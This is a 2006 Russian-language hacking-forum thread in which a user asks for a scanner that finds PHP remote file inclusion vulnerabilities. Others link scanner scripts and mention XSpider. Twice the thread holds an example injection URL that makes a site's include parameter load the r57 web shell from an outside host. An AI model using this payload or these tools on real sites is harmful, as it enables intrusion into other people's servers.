Просмотр полной версии : сканнер уязвимостей в пхп инклуде
BlackCats
19.08.2006, 20:46
у когонить есть такой?
А теперь ещё раз по-русски и желательно конкретнее выражай свои мысли, а то нихера не понятно)
+toxa+ он имеет ввиду сканер, который ищет php injection на сайте....
BlackCats
19.08.2006, 20:58
+toxa+
ну знаеш народ делает инклуды?
типа:
antichat.ru?page=http://rst.void.ru/download/r57shell.txt?
+toxa+
antichat.ru?page=http://rst.void.ru/download/r57shell.txt?
:D всё! взломали античат.... :D
gemaglabin
19.08.2006, 22:16
Есть такое причем скриптов море
Допустим утилита jane-jane от cup.su - http://cup.su/releases/jane.txt
Или подобное от n4n0bit http://n4n0bit.nm.ru/c0d3/nJin4.pl.txt
BlackCats
19.08.2006, 22:19
нда... так ни 1 дельного ответа не получил....
max_pain89
19.08.2006, 22:29
Он имеет ввиду не сканер, а вбиваешь адрес сайта и он быстро сам заливает шелл, готовит кофе и дефэйсит от имени Усамы.
BlackCats
19.08.2006, 22:39
Он имеет ввиду не сканер, а вбиваешь адрес сайта и он быстро сам заливает шелл, готовит кофе и дефэйсит от имени Усамы.
нет! я имею ввиду сканнер, чтоб не вручную каждый хост проверять, а вбил и он пишет - вот тут index.php?XEP=
есть уязвимость в инклуде.
gemaglabin
19.08.2006, 23:04
Чем мой ответ не устраивает?
BlackCats
19.08.2006, 23:30
там скрипты.... а мне хотелось бы программу - скрипты - геморой.
gemaglabin
19.08.2006, 23:40
А XSpider 7 разве не чекает подобным образом?
max_pain89
19.08.2006, 23:43
конечно чекает, он вообще все доступные параметры чекает на все, даже пост параметры... но ручками иногда лучше выходит, если например в гугле пробить сайт.
+toxa+
ну знаеш народ делает инклуды?
типа:
antichat.ru?page=http://rst.void.ru/download/r57shell.txt?
+1 спасибо)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot